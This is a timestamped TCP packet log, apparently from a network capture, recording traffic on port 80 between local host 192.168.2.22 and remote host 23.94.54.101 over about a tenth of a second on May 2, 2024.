May 2, 2024 04:54:53.972542048 CEST	80	49161	23.94.54.101	192.168.2.22
May 2, 2024 04:54:53.972547054 CEST	49161	80	192.168.2.22	23.94.54.101
May 2, 2024 04:54:53.972553968 CEST	80	49161	23.94.54.101	192.168.2.22
May 2, 2024 04:54:53.972564936 CEST	80	49161	23.94.54.101	192.168.2.22
May 2, 2024 04:54:53.972567081 CEST	49161	80	192.168.2.22	23.94.54.101
May 2, 2024 04:54:53.972578049 CEST	80	49161	23.94.54.101	192.168.2.22
May 2, 2024 04:54:53.972589970 CEST	80	49161	23.94.54.101	192.168.2.22
May 2, 2024 04:54:53.972594976 CEST	49161	80	192.168.2.22	23.94.54.101
May 2, 2024 04:54:53.972608089 CEST	80	49161	23.94.54.101	192.168.2.22
May 2, 2024 04:54:53.972620010 CEST	80	49161	23.94.54.101	192.168.2.22
May 2, 2024 04:54:53.972625017 CEST	49161	80	192.168.2.22	23.94.54.101
May 2, 2024 04:54:53.972631931 CEST	80	49161	23.94.54.101	192.168.2.22
May 2, 2024 04:54:53.972642899 CEST	80	49161	23.94.54.101	192.168.2.22
May 2, 2024 04:54:53.972655058 CEST	80	49161	23.94.54.101	192.168.2.22
May 2, 2024 04:54:53.972661018 CEST	49161	80	192.168.2.22	23.94.54.101
May 2, 2024 04:54:53.972661018 CEST	49161	80	192.168.2.22	23.94.54.101
May 2, 2024 04:54:53.972668886 CEST	80	49161	23.94.54.101	192.168.2.22
May 2, 2024 04:54:53.972681046 CEST	80	49161	23.94.54.101	192.168.2.22
May 2, 2024 04:54:53.972692966 CEST	80	49161	23.94.54.101	192.168.2.22
May 2, 2024 04:54:53.972703934 CEST	80	49161	23.94.54.101	192.168.2.22
May 2, 2024 04:54:53.972707987 CEST	49161	80	192.168.2.22	23.94.54.101
May 2, 2024 04:54:53.972717047 CEST	80	49161	23.94.54.101	192.168.2.22
May 2, 2024 04:54:53.972728014 CEST	80	49161	23.94.54.101	192.168.2.22
May 2, 2024 04:54:53.972732067 CEST	49161	80	192.168.2.22	23.94.54.101
May 2, 2024 04:54:53.972739935 CEST	80	49161	23.94.54.101	192.168.2.22
May 2, 2024 04:54:53.972753048 CEST	80	49161	23.94.54.101	192.168.2.22
May 2, 2024 04:54:53.972764969 CEST	80	49161	23.94.54.101	192.168.2.22
May 2, 2024 04:54:53.972764969 CEST	49161	80	192.168.2.22	23.94.54.101
May 2, 2024 04:54:53.972789049 CEST	49161	80	192.168.2.22	23.94.54.101
May 2, 2024 04:54:53.972791910 CEST	80	49161	23.94.54.101	192.168.2.22
May 2, 2024 04:54:53.972831964 CEST	49161	80	192.168.2.22	23.94.54.101
May 2, 2024 04:54:53.972845078 CEST	80	49161	23.94.54.101	192.168.2.22
May 2, 2024 04:54:53.972860098 CEST	80	49161	23.94.54.101	192.168.2.22
May 2, 2024 04:54:53.972871065 CEST	80	49161	23.94.54.101	192.168.2.22
May 2, 2024 04:54:53.972882986 CEST	80	49161	23.94.54.101	192.168.2.22
May 2, 2024 04:54:53.972894907 CEST	80	49161	23.94.54.101	192.168.2.22
May 2, 2024 04:54:53.972899914 CEST	49161	80	192.168.2.22	23.94.54.101
May 2, 2024 04:54:53.972908020 CEST	49161	80	192.168.2.22	23.94.54.101
May 2, 2024 04:54:53.972938061 CEST	80	49161	23.94.54.101	192.168.2.22
May 2, 2024 04:54:53.972950935 CEST	80	49161	23.94.54.101	192.168.2.22
May 2, 2024 04:54:53.972973108 CEST	80	49161	23.94.54.101	192.168.2.22
May 2, 2024 04:54:53.972974062 CEST	49161	80	192.168.2.22	23.94.54.101
May 2, 2024 04:54:53.972996950 CEST	80	49161	23.94.54.101	192.168.2.22
May 2, 2024 04:54:53.973007917 CEST	49161	80	192.168.2.22	23.94.54.101
May 2, 2024 04:54:53.973038912 CEST	80	49161	23.94.54.101	192.168.2.22
May 2, 2024 04:54:53.973062038 CEST	80	49161	23.94.54.101	192.168.2.22
May 2, 2024 04:54:53.973074913 CEST	49161	80	192.168.2.22	23.94.54.101
May 2, 2024 04:54:53.973123074 CEST	80	49161	23.94.54.101	192.168.2.22
May 2, 2024 04:54:53.973134995 CEST	80	49161	23.94.54.101	192.168.2.22
May 2, 2024 04:54:53.973157883 CEST	80	49161	23.94.54.101	192.168.2.22
May 2, 2024 04:54:53.973159075 CEST	49161	80	192.168.2.22	23.94.54.101
May 2, 2024 04:54:53.973195076 CEST	49161	80	192.168.2.22	23.94.54.101
May 2, 2024 04:54:53.973239899 CEST	80	49161	23.94.54.101	192.168.2.22
May 2, 2024 04:54:53.973299026 CEST	80	49161	23.94.54.101	192.168.2.22
May 2, 2024 04:54:53.973334074 CEST	49161	80	192.168.2.22	23.94.54.101
May 2, 2024 04:54:53.973413944 CEST	80	49161	23.94.54.101	192.168.2.22
May 2, 2024 04:54:53.973426104 CEST	80	49161	23.94.54.101	192.168.2.22
May 2, 2024 04:54:53.973438025 CEST	80	49161	23.94.54.101	192.168.2.22
May 2, 2024 04:54:53.973462105 CEST	80	49161	23.94.54.101	192.168.2.22
May 2, 2024 04:54:53.973462105 CEST	49161	80	192.168.2.22	23.94.54.101
May 2, 2024 04:54:53.973485947 CEST	80	49161	23.94.54.101	192.168.2.22
May 2, 2024 04:54:53.973500013 CEST	49161	80	192.168.2.22	23.94.54.101
May 2, 2024 04:54:53.973519087 CEST	80	49161	23.94.54.101	192.168.2.22
May 2, 2024 04:54:53.973551035 CEST	80	49161	23.94.54.101	192.168.2.22
May 2, 2024 04:54:53.973556995 CEST	49161	80	192.168.2.22	23.94.54.101
May 2, 2024 04:54:53.973573923 CEST	80	49161	23.94.54.101	192.168.2.22
May 2, 2024 04:54:53.973606110 CEST	80	49161	23.94.54.101	192.168.2.22
May 2, 2024 04:54:53.973612070 CEST	49161	80	192.168.2.22	23.94.54.101
May 2, 2024 04:54:53.973619938 CEST	80	49161	23.94.54.101	192.168.2.22
May 2, 2024 04:54:53.973642111 CEST	80	49161	23.94.54.101	192.168.2.22
May 2, 2024 04:54:53.973656893 CEST	49161	80	192.168.2.22	23.94.54.101
May 2, 2024 04:54:53.973685026 CEST	80	49161	23.94.54.101	192.168.2.22
May 2, 2024 04:54:53.973696947 CEST	80	49161	23.94.54.101	192.168.2.22
May 2, 2024 04:54:53.973717928 CEST	80	49161	23.94.54.101	192.168.2.22
May 2, 2024 04:54:53.973722935 CEST	49161	80	192.168.2.22	23.94.54.101
May 2, 2024 04:54:53.973731995 CEST	80	49161	23.94.54.101	192.168.2.22
May 2, 2024 04:54:53.973756075 CEST	49161	80	192.168.2.22	23.94.54.101
May 2, 2024 04:54:53.973764896 CEST	80	49161	23.94.54.101	192.168.2.22
May 2, 2024 04:54:53.973778009 CEST	80	49161	23.94.54.101	192.168.2.22
May 2, 2024 04:54:53.973799944 CEST	49161	80	192.168.2.22	23.94.54.101
May 2, 2024 04:54:53.973836899 CEST	80	49161	23.94.54.101	192.168.2.22
May 2, 2024 04:54:53.973850965 CEST	80	49161	23.94.54.101	192.168.2.22
May 2, 2024 04:54:53.973862886 CEST	80	49161	23.94.54.101	192.168.2.22
May 2, 2024 04:54:53.973875046 CEST	80	49161	23.94.54.101	192.168.2.22
May 2, 2024 04:54:53.973876953 CEST	49161	80	192.168.2.22	23.94.54.101
May 2, 2024 04:54:53.973886013 CEST	49161	80	192.168.2.22	23.94.54.101
May 2, 2024 04:54:53.973916054 CEST	80	49161	23.94.54.101	192.168.2.22
May 2, 2024 04:54:53.973948956 CEST	80	49161	23.94.54.101	192.168.2.22
May 2, 2024 04:54:53.973948956 CEST	49161	80	192.168.2.22	23.94.54.101
May 2, 2024 04:54:53.973982096 CEST	80	49161	23.94.54.101	192.168.2.22
May 2, 2024 04:54:53.974004030 CEST	80	49161	23.94.54.101	192.168.2.22
May 2, 2024 04:54:53.974020004 CEST	49161	80	192.168.2.22	23.94.54.101
May 2, 2024 04:54:53.974045992 CEST	80	49161	23.94.54.101	192.168.2.22
May 2, 2024 04:54:53.974057913 CEST	80	49161	23.94.54.101	192.168.2.22
May 2, 2024 04:54:53.974080086 CEST	80	49161	23.94.54.101	192.168.2.22
May 2, 2024 04:54:53.974085093 CEST	49161	80	192.168.2.22	23.94.54.101
May 2, 2024 04:54:53.974122047 CEST	80	49161	23.94.54.101	192.168.2.22
May 2, 2024 04:54:53.974123955 CEST	49161	80	192.168.2.22	23.94.54.101
May 2, 2024 04:54:53.974136114 CEST	80	49161	23.94.54.101	192.168.2.22
May 2, 2024 04:54:53.974158049 CEST	80	49161	23.94.54.101	192.168.2.22
May 2, 2024 04:54:53.974173069 CEST	49161	80	192.168.2.22	23.94.54.101
May 2, 2024 04:54:53.974201918 CEST	80	49161	23.94.54.101	192.168.2.22
May 2, 2024 04:54:53.974214077 CEST	80	49161	23.94.54.101	192.168.2.22
May 2, 2024 04:54:53.974246025 CEST	49161	80	192.168.2.22	23.94.54.101
May 2, 2024 04:54:53.974278927 CEST	80	49161	23.94.54.101	192.168.2.22
May 2, 2024 04:54:53.974303007 CEST	80	49161	23.94.54.101	192.168.2.22
May 2, 2024 04:54:53.974347115 CEST	49161	80	192.168.2.22	23.94.54.101
May 2, 2024 04:54:53.974354029 CEST	80	49161	23.94.54.101	192.168.2.22
May 2, 2024 04:54:53.974395037 CEST	80	49161	23.94.54.101	192.168.2.22
May 2, 2024 04:54:53.974435091 CEST	49161	80	192.168.2.22	23.94.54.101
May 2, 2024 04:54:53.974455118 CEST	80	49161	23.94.54.101	192.168.2.22
May 2, 2024 04:54:53.974487066 CEST	80	49161	23.94.54.101	192.168.2.22
May 2, 2024 04:54:53.974520922 CEST	80	49161	23.94.54.101	192.168.2.22
May 2, 2024 04:54:53.974525928 CEST	49161	80	192.168.2.22	23.94.54.101
May 2, 2024 04:54:53.974545956 CEST	80	49161	23.94.54.101	192.168.2.22
May 2, 2024 04:54:53.974586010 CEST	49161	80	192.168.2.22	23.94.54.101
May 2, 2024 04:54:53.974589109 CEST	80	49161	23.94.54.101	192.168.2.22
May 2, 2024 04:54:53.974611998 CEST	80	49161	23.94.54.101	192.168.2.22
May 2, 2024 04:54:53.974654913 CEST	49161	80	192.168.2.22	23.94.54.101
May 2, 2024 04:54:53.974664927 CEST	80	49161	23.94.54.101	192.168.2.22
May 2, 2024 04:54:53.974678040 CEST	80	49161	23.94.54.101	192.168.2.22
May 2, 2024 04:54:53.974689007 CEST	80	49161	23.94.54.101	192.168.2.22
May 2, 2024 04:54:53.974708080 CEST	49161	80	192.168.2.22	23.94.54.101
May 2, 2024 04:54:53.974747896 CEST	80	49161	23.94.54.101	192.168.2.22
May 2, 2024 04:54:53.974761009 CEST	80	49161	23.94.54.101	192.168.2.22
May 2, 2024 04:54:53.974772930 CEST	80	49161	23.94.54.101	192.168.2.22
May 2, 2024 04:54:53.974783897 CEST	49161	80	192.168.2.22	23.94.54.101
May 2, 2024 04:54:53.974812031 CEST	49161	80	192.168.2.22	23.94.54.101
May 2, 2024 04:54:53.975079060 CEST	80	49161	23.94.54.101	192.168.2.22
May 2, 2024 04:54:53.975094080 CEST	80	49161	23.94.54.101	192.168.2.22
May 2, 2024 04:54:53.975122929 CEST	80	49161	23.94.54.101	192.168.2.22
May 2, 2024 04:54:53.975127935 CEST	49161	80	192.168.2.22	23.94.54.101
May 2, 2024 04:54:53.975136995 CEST	80	49161	23.94.54.101	192.168.2.22
May 2, 2024 04:54:53.975172043 CEST	49161	80	192.168.2.22	23.94.54.101
May 2, 2024 04:54:53.975178003 CEST	80	49161	23.94.54.101	192.168.2.22
May 2, 2024 04:54:53.975191116 CEST	80	49161	23.94.54.101	192.168.2.22
May 2, 2024 04:54:53.975203037 CEST	80	49161	23.94.54.101	192.168.2.22
May 2, 2024 04:54:53.975227118 CEST	49161	80	192.168.2.22	23.94.54.101
May 2, 2024 04:54:53.975255966 CEST	80	49161	23.94.54.101	192.168.2.22
May 2, 2024 04:54:53.975275040 CEST	80	49161	23.94.54.101	192.168.2.22
May 2, 2024 04:54:53.975286961 CEST	49161	80	192.168.2.22	23.94.54.101
May 2, 2024 04:54:53.975294113 CEST	80	49161	23.94.54.101	192.168.2.22
May 2, 2024 04:54:53.975306988 CEST	80	49161	23.94.54.101	192.168.2.22
May 2, 2024 04:54:53.975330114 CEST	49161	80	192.168.2.22	23.94.54.101
May 2, 2024 04:54:53.975382090 CEST	80	49161	23.94.54.101	192.168.2.22
May 2, 2024 04:54:53.975420952 CEST	49161	80	192.168.2.22	23.94.54.101
May 2, 2024 04:54:53.975591898 CEST	80	49161	23.94.54.101	192.168.2.22
May 2, 2024 04:54:53.975605011 CEST	80	49161	23.94.54.101	192.168.2.22
May 2, 2024 04:54:53.975615978 CEST	80	49161	23.94.54.101	192.168.2.22
May 2, 2024 04:54:53.975629091 CEST	80	49161	23.94.54.101	192.168.2.22
May 2, 2024 04:54:53.975641012 CEST	49161	80	192.168.2.22	23.94.54.101
May 2, 2024 04:54:53.975641012 CEST	80	49161	23.94.54.101	192.168.2.22
May 2, 2024 04:54:53.975655079 CEST	80	49161	23.94.54.101	192.168.2.22
May 2, 2024 04:54:53.975667000 CEST	80	49161	23.94.54.101	192.168.2.22
May 2, 2024 04:54:53.975672007 CEST	49161	80	192.168.2.22	23.94.54.101
May 2, 2024 04:54:53.975678921 CEST	80	49161	23.94.54.101	192.168.2.22
May 2, 2024 04:54:53.975697041 CEST	49161	80	192.168.2.22	23.94.54.101
May 2, 2024 04:54:53.975745916 CEST	80	49161	23.94.54.101	192.168.2.22
May 2, 2024 04:54:53.975759029 CEST	80	49161	23.94.54.101	192.168.2.22
May 2, 2024 04:54:53.975769997 CEST	80	49161	23.94.54.101	192.168.2.22
May 2, 2024 04:54:53.975781918 CEST	80	49161	23.94.54.101	192.168.2.22
May 2, 2024 04:54:53.975790024 CEST	49161	80	192.168.2.22	23.94.54.101
May 2, 2024 04:54:53.975825071 CEST	49161	80	192.168.2.22	23.94.54.101
May 2, 2024 04:54:53.976255894 CEST	80	49161	23.94.54.101	192.168.2.22
May 2, 2024 04:54:53.976311922 CEST	80	49161	23.94.54.101	192.168.2.22
May 2, 2024 04:54:53.976332903 CEST	80	49161	23.94.54.101	192.168.2.22
May 2, 2024 04:54:53.976353884 CEST	49161	80	192.168.2.22	23.94.54.101
May 2, 2024 04:54:53.976382017 CEST	80	49161	23.94.54.101	192.168.2.22
May 2, 2024 04:54:53.976402998 CEST	80	49161	23.94.54.101	192.168.2.22
May 2, 2024 04:54:53.976428032 CEST	49161	80	192.168.2.22	23.94.54.101
May 2, 2024 04:54:53.976440907 CEST	80	49161	23.94.54.101	192.168.2.22
May 2, 2024 04:54:53.976465940 CEST	80	49161	23.94.54.101	192.168.2.22
May 2, 2024 04:54:53.976478100 CEST	80	49161	23.94.54.101	192.168.2.22
May 2, 2024 04:54:53.976480007 CEST	49161	80	192.168.2.22	23.94.54.101
May 2, 2024 04:54:53.976510048 CEST	49161	80	192.168.2.22	23.94.54.101
May 2, 2024 04:54:53.976521969 CEST	80	49161	23.94.54.101	192.168.2.22
May 2, 2024 04:54:53.976547003 CEST	80	49161	23.94.54.101	192.168.2.22
May 2, 2024 04:54:53.976584911 CEST	49161	80	192.168.2.22	23.94.54.101
May 2, 2024 04:54:53.976587057 CEST	80	49161	23.94.54.101	192.168.2.22
May 2, 2024 04:54:53.976643085 CEST	80	49161	23.94.54.101	192.168.2.22
May 2, 2024 04:54:53.976655960 CEST	80	49161	23.94.54.101	192.168.2.22
May 2, 2024 04:54:53.976667881 CEST	80	49161	23.94.54.101	192.168.2.22
May 2, 2024 04:54:53.976680994 CEST	49161	80	192.168.2.22	23.94.54.101
May 2, 2024 04:54:53.976705074 CEST	49161	80	192.168.2.22	23.94.54.101
May 2, 2024 04:54:53.976711035 CEST	80	49161	23.94.54.101	192.168.2.22
May 2, 2024 04:54:53.976748943 CEST	80	49161	23.94.54.101	192.168.2.22
May 2, 2024 04:54:53.976762056 CEST	80	49161	23.94.54.101	192.168.2.22
May 2, 2024 04:54:53.976772070 CEST	80	49161	23.94.54.101	192.168.2.22
May 2, 2024 04:54:53.976783991 CEST	49161	80	192.168.2.22	23.94.54.101
May 2, 2024 04:54:53.976807117 CEST	49161	80	192.168.2.22	23.94.54.101
May 2, 2024 04:54:53.976823092 CEST	80	49161	23.94.54.101	192.168.2.22
May 2, 2024 04:54:53.976836920 CEST	80	49161	23.94.54.101	192.168.2.22
May 2, 2024 04:54:53.976847887 CEST	80	49161	23.94.54.101	192.168.2.22
May 2, 2024 04:54:53.976870060 CEST	49161	80	192.168.2.22	23.94.54.101
May 2, 2024 04:54:53.976871014 CEST	80	49161	23.94.54.101	192.168.2.22
May 2, 2024 04:54:53.976907969 CEST	49161	80	192.168.2.22	23.94.54.101
May 2, 2024 04:54:53.976917028 CEST	80	49161	23.94.54.101	192.168.2.22
May 2, 2024 04:54:53.976931095 CEST	80	49161	23.94.54.101	192.168.2.22
May 2, 2024 04:54:53.976953030 CEST	80	49161	23.94.54.101	192.168.2.22
May 2, 2024 04:54:53.976965904 CEST	80	49161	23.94.54.101	192.168.2.22
May 2, 2024 04:54:53.976967096 CEST	49161	80	192.168.2.22	23.94.54.101
May 2, 2024 04:54:53.976996899 CEST	49161	80	192.168.2.22	23.94.54.101
May 2, 2024 04:54:53.977035046 CEST	80	49161	23.94.54.101	192.168.2.22
May 2, 2024 04:54:53.977092028 CEST	80	49161	23.94.54.101	192.168.2.22
May 2, 2024 04:54:53.977128983 CEST	49161	80	192.168.2.22	23.94.54.101
May 2, 2024 04:54:53.977165937 CEST	80	49161	23.94.54.101	192.168.2.22
May 2, 2024 04:54:53.977267981 CEST	80	49161	23.94.54.101	192.168.2.22
May 2, 2024 04:54:53.977303982 CEST	49161	80	192.168.2.22	23.94.54.101
May 2, 2024 04:54:53.977333069 CEST	80	49161	23.94.54.101	192.168.2.22
May 2, 2024 04:54:53.977408886 CEST	80	49161	23.94.54.101	192.168.2.22
May 2, 2024 04:54:53.977421045 CEST	80	49161	23.94.54.101	192.168.2.22
May 2, 2024 04:54:53.977457047 CEST	49161	80	192.168.2.22	23.94.54.101
May 2, 2024 04:54:53.977485895 CEST	80	49161	23.94.54.101	192.168.2.22
May 2, 2024 04:54:53.977535963 CEST	80	49161	23.94.54.101	192.168.2.22
May 2, 2024 04:54:53.977549076 CEST	80	49161	23.94.54.101	192.168.2.22
May 2, 2024 04:54:53.977581978 CEST	49161	80	192.168.2.22	23.94.54.101
May 2, 2024 04:54:53.977587938 CEST	80	49161	23.94.54.101	192.168.2.22
May 2, 2024 04:54:53.977601051 CEST	80	49161	23.94.54.101	192.168.2.22
May 2, 2024 04:54:53.977612019 CEST	80	49161	23.94.54.101	192.168.2.22
May 2, 2024 04:54:53.977622986 CEST	80	49161	23.94.54.101	192.168.2.22
May 2, 2024 04:54:53.977628946 CEST	49161	80	192.168.2.22	23.94.54.101
May 2, 2024 04:54:53.977655888 CEST	49161	80	192.168.2.22	23.94.54.101
May 2, 2024 04:54:53.977664948 CEST	80	49161	23.94.54.101	192.168.2.22
May 2, 2024 04:54:53.977713108 CEST	80	49161	23.94.54.101	192.168.2.22
May 2, 2024 04:54:53.977725983 CEST	80	49161	23.94.54.101	192.168.2.22
May 2, 2024 04:54:53.977737904 CEST	80	49161	23.94.54.101	192.168.2.22
May 2, 2024 04:54:53.977750063 CEST	80	49161	23.94.54.101	192.168.2.22
May 2, 2024 04:54:53.977761984 CEST	49161	80	192.168.2.22	23.94.54.101
May 2, 2024 04:54:53.977761984 CEST	49161	80	192.168.2.22	23.94.54.101
May 2, 2024 04:54:53.977791071 CEST	80	49161	23.94.54.101	192.168.2.22
May 2, 2024 04:54:53.977823973 CEST	80	49161	23.94.54.101	192.168.2.22
May 2, 2024 04:54:53.977833986 CEST	49161	80	192.168.2.22	23.94.54.101
May 2, 2024 04:54:53.977838993 CEST	80	49161	23.94.54.101	192.168.2.22
May 2, 2024 04:54:53.977878094 CEST	49161	80	192.168.2.22	23.94.54.101
May 2, 2024 04:54:53.978091955 CEST	49161	80	192.168.2.22	23.94.54.101
May 2, 2024 04:54:53.997298956 CEST	49161	80	192.168.2.22	23.94.54.101
May 2, 2024 04:54:54.076338053 CEST	80	49161	23.94.54.101	192.168.2.22
May 2, 2024 04:54:54.076360941 CEST	80	49161	23.94.54.101	192.168.2.22
May 2, 2024 04:54:54.076374054 CEST	80	49161	23.94.54.101	192.168.2.22
May 2, 2024 04:54:54.076386929 CEST	80	49161	23.94.54.101	192.168.2.22
May 2, 2024 04:54:54.076399088 CEST	80	49161	23.94.54.101	192.168.2.22
May 2, 2024 04:54:54.076412916 CEST	80	49161	23.94.54.101	192.168.2.22
May 2, 2024 04:54:54.076426029 CEST	80	49161	23.94.54.101	192.168.2.22
May 2, 2024 04:54:54.076437950 CEST	80	49161	23.94.54.101	192.168.2.22
May 2, 2024 04:54:54.076451063 CEST	80	49161	23.94.54.101	192.168.2.22
May 2, 2024 04:54:54.076462984 CEST	80	49161	23.94.54.101	192.168.2.22
May 2, 2024 04:54:54.076515913 CEST	49161	80	192.168.2.22	23.94.54.101
May 2, 2024 04:54:54.076664925 CEST	80	49161	23.94.54.101	192.168.2.22
May 2, 2024 04:54:54.076687098 CEST	80	49161	23.94.54.101	192.168.2.22
May 2, 2024 04:54:54.076708078 CEST	80	49161	23.94.54.101	192.168.2.22
May 2, 2024 04:54:54.076714993 CEST	49161	80	192.168.2.22	23.94.54.101
May 2, 2024 04:54:54.076750040 CEST	80	49161	23.94.54.101	192.168.2.22
May 2, 2024 04:54:54.076750994 CEST	49161	80	192.168.2.22	23.94.54.101
May 2, 2024 04:54:54.076906919 CEST	80	49161	23.94.54.101	192.168.2.22
May 2, 2024 04:54:54.076919079 CEST	80	49161	23.94.54.101	192.168.2.22
May 2, 2024 04:54:54.076930046 CEST	80	49161	23.94.54.101	192.168.2.22
May 2, 2024 04:54:54.076952934 CEST	49161	80	192.168.2.22	23.94.54.101
May 2, 2024 04:54:54.077008963 CEST	80	49161	23.94.54.101	192.168.2.22
May 2, 2024 04:54:54.077054024 CEST	49161	80	192.168.2.22	23.94.54.101
May 2, 2024 04:54:54.077141047 CEST	80	49161	23.94.54.101	192.168.2.22
May 2, 2024 04:54:54.077157974 CEST	80	49161	23.94.54.101	192.168.2.22
May 2, 2024 04:54:54.077178955 CEST	80	49161	23.94.54.101	192.168.2.22
May 2, 2024 04:54:54.077194929 CEST	49161	80	192.168.2.22	23.94.54.101
May 2, 2024 04:54:54.077258110 CEST	80	49161	23.94.54.101	192.168.2.22
May 2, 2024 04:54:54.077270985 CEST	80	49161	23.94.54.101	192.168.2.22
May 2, 2024 04:54:54.077284098 CEST	80	49161	23.94.54.101	192.168.2.22
May 2, 2024 04:54:54.077296019 CEST	49161	80	192.168.2.22	23.94.54.101
May 2, 2024 04:54:54.077321053 CEST	49161	80	192.168.2.22	23.94.54.101
May 2, 2024 04:54:54.077377081 CEST	80	49161	23.94.54.101	192.168.2.22
May 2, 2024 04:54:54.077440977 CEST	80	49161	23.94.54.101	192.168.2.22
May 2, 2024 04:54:54.077455044 CEST	80	49161	23.94.54.101	192.168.2.22
May 2, 2024 04:54:54.077466965 CEST	80	49161	23.94.54.101	192.168.2.22
May 2, 2024 04:54:54.077476978 CEST	49161	80	192.168.2.22	23.94.54.101
May 2, 2024 04:54:54.077478886 CEST	80	49161	23.94.54.101	192.168.2.22
May 2, 2024 04:54:54.077492952 CEST	80	49161	23.94.54.101	192.168.2.22
May 2, 2024 04:54:54.077497959 CEST	49161	80	192.168.2.22	23.94.54.101
May 2, 2024 04:54:54.077529907 CEST	49161	80	192.168.2.22	23.94.54.101
May 2, 2024 04:54:54.077550888 CEST	80	49161	23.94.54.101	192.168.2.22
May 2, 2024 04:54:54.077574968 CEST	80	49161	23.94.54.101	192.168.2.22
May 2, 2024 04:54:54.077614069 CEST	49161	80	192.168.2.22	23.94.54.101
May 2, 2024 04:54:54.077956915 CEST	80	49161	23.94.54.101	192.168.2.22
May 2, 2024 04:54:54.078030109 CEST	80	49161	23.94.54.101	192.168.2.22
May 2, 2024 04:54:54.078073978 CEST	49161	80	192.168.2.22	23.94.54.101
May 2, 2024 04:54:54.078107119 CEST	80	49161	23.94.54.101	192.168.2.22
May 2, 2024 04:54:54.078241110 CEST	80	49161	23.94.54.101	192.168.2.22
May 2, 2024 04:54:54.078284025 CEST	49161	80	192.168.2.22	23.94.54.101
May 2, 2024 04:54:54.078341007 CEST	80	49161	23.94.54.101	192.168.2.22
May 2, 2024 04:54:54.078416109 CEST	80	49161	23.94.54.101	192.168.2.22
May 2, 2024 04:54:54.078454018 CEST	49161	80	192.168.2.22	23.94.54.101
May 2, 2024 04:54:54.078510046 CEST	80	49161	23.94.54.101	192.168.2.22
May 2, 2024 04:54:54.078608036 CEST	80	49161	23.94.54.101	192.168.2.22
May 2, 2024 04:54:54.078649998 CEST	49161	80	192.168.2.22	23.94.54.101
May 2, 2024 04:54:54.078751087 CEST	80	49161	23.94.54.101	192.168.2.22
May 2, 2024 04:54:54.078819990 CEST	80	49161	23.94.54.101	192.168.2.22
May 2, 2024 04:54:54.078865051 CEST	49161	80	192.168.2.22	23.94.54.101
May 2, 2024 04:54:54.078888893 CEST	80	49161	23.94.54.101	192.168.2.22
May 2, 2024 04:54:54.079030991 CEST	80	49161	23.94.54.101	192.168.2.22
May 2, 2024 04:54:54.079063892 CEST	49161	80	192.168.2.22	23.94.54.101
May 2, 2024 04:54:54.079121113 CEST	80	49161	23.94.54.101	192.168.2.22
May 2, 2024 04:54:54.079214096 CEST	80	49161	23.94.54.101	192.168.2.22
May 2, 2024 04:54:54.079252005 CEST	49161	80	192.168.2.22	23.94.54.101
May 2, 2024 04:54:54.079274893 CEST	80	49161	23.94.54.101	192.168.2.22
May 2, 2024 04:54:54.079322100 CEST	80	49161	23.94.54.101	192.168.2.22
May 2, 2024 04:54:54.079364061 CEST	49161	80	192.168.2.22	23.94.54.101
May 2, 2024 04:54:54.079386950 CEST	80	49161	23.94.54.101	192.168.2.22
May 2, 2024 04:54:54.079408884 CEST	80	49161	23.94.54.101	192.168.2.22
May 2, 2024 04:54:54.079447031 CEST	49161	80	192.168.2.22	23.94.54.101
May 2, 2024 04:54:54.079480886 CEST	80	49161	23.94.54.101	192.168.2.22
May 2, 2024 04:54:54.079535961 CEST	80	49161	23.94.54.101	192.168.2.22
May 2, 2024 04:54:54.079571009 CEST	49161	80	192.168.2.22	23.94.54.101
May 2, 2024 04:54:54.079600096 CEST	80	49161	23.94.54.101	192.168.2.22
May 2, 2024 04:54:54.079619884 CEST	80	49161	23.94.54.101	192.168.2.22
May 2, 2024 04:54:54.079657078 CEST	49161	80	192.168.2.22	23.94.54.101
May 2, 2024 04:54:54.079691887 CEST	80	49161	23.94.54.101	192.168.2.22
May 2, 2024 04:54:54.079740047 CEST	80	49161	23.94.54.101	192.168.2.22
May 2, 2024 04:54:54.079775095 CEST	49161	80	192.168.2.22	23.94.54.101
May 2, 2024 04:54:54.079849005 CEST	80	49161	23.94.54.101	192.168.2.22
May 2, 2024 04:54:54.079926014 CEST	80	49161	23.94.54.101	192.168.2.22
May 2, 2024 04:54:54.079972982 CEST	49161	80	192.168.2.22	23.94.54.101
May 2, 2024 04:54:54.080049992 CEST	80	49161	23.94.54.101	192.168.2.22
May 2, 2024 04:54:54.080116987 CEST	80	49161	23.94.54.101	192.168.2.22
May 2, 2024 04:54:54.080154896 CEST	49161	80	192.168.2.22	23.94.54.101
May 2, 2024 04:54:54.080178976 CEST	80	49161	23.94.54.101	192.168.2.22
May 2, 2024 04:54:54.080214024 CEST	80	49161	23.94.54.101	192.168.2.22
May 2, 2024 04:54:54.080250025 CEST	49161	80	192.168.2.22	23.94.54.101
May 2, 2024 04:54:54.080272913 CEST	80	49161	23.94.54.101	192.168.2.22
May 2, 2024 04:54:54.080332994 CEST	80	49161	23.94.54.101	192.168.2.22
May 2, 2024 04:54:54.080374956 CEST	49161	80	192.168.2.22	23.94.54.101
May 2, 2024 04:54:54.080400944 CEST	80	49161	23.94.54.101	192.168.2.22
May 2, 2024 04:54:54.080468893 CEST	80	49161	23.94.54.101	192.168.2.22
May 2, 2024 04:54:54.080513000 CEST	49161	80	192.168.2.22	23.94.54.101
May 2, 2024 04:54:54.080519915 CEST	80	49161	23.94.54.101	192.168.2.22
May 2, 2024 04:54:54.080553055 CEST	80	49161	23.94.54.101	192.168.2.22
May 2, 2024 04:54:54.080596924 CEST	49161	80	192.168.2.22	23.94.54.101
May 2, 2024 04:54:54.080702066 CEST	80	49161	23.94.54.101	192.168.2.22
May 2, 2024 04:54:54.080748081 CEST	80	49161	23.94.54.101	192.168.2.22
May 2, 2024 04:54:54.080784082 CEST	49161	80	192.168.2.22	23.94.54.101
May 2, 2024 04:54:54.080806971 CEST	80	49161	23.94.54.101	192.168.2.22
May 2, 2024 04:54:54.080938101 CEST	80	49161	23.94.54.101	192.168.2.22
May 2, 2024 04:54:54.080981970 CEST	49161	80	192.168.2.22	23.94.54.101
May 2, 2024 04:54:54.081068993 CEST	80	49161	23.94.54.101	192.168.2.22
May 2, 2024 04:54:54.081131935 CEST	80	49161	23.94.54.101	192.168.2.22
May 2, 2024 04:54:54.081172943 CEST	49161	80	192.168.2.22	23.94.54.101
May 2, 2024 04:54:54.081207037 CEST	80	49161	23.94.54.101	192.168.2.22
May 2, 2024 04:54:54.081348896 CEST	80	49161	23.94.54.101	192.168.2.22
May 2, 2024 04:54:54.081392050 CEST	49161	80	192.168.2.22	23.94.54.101
May 2, 2024 04:54:54.081408978 CEST	80	49161	23.94.54.101	192.168.2.22
May 2, 2024 04:54:54.081465960 CEST	80	49161	23.94.54.101	192.168.2.22
